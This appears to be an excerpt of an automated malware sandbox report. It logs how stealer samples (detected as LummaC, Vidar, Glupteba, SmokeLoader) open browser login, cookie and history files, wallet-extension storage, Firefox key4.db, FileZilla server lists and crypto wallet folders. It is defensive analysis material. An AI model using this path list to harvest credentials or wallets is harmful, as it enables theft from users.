            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.db
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKC
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
            Source: Yara matchFile source: 00000017.00000003.3114615460.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.3115169288.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.3115958213.0000000001490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: A0B.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 728, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Glupteba
            Source: Yara matchFile source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: A0B.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Yara detected Vidar
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Yara detected Vidar stealer
            Source: Yara matchFile source: 35.2.build2.exe.21d15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 41.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 41.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.2.build2.exe.21d15a0.1.unpack, type: UNPACKEDPE
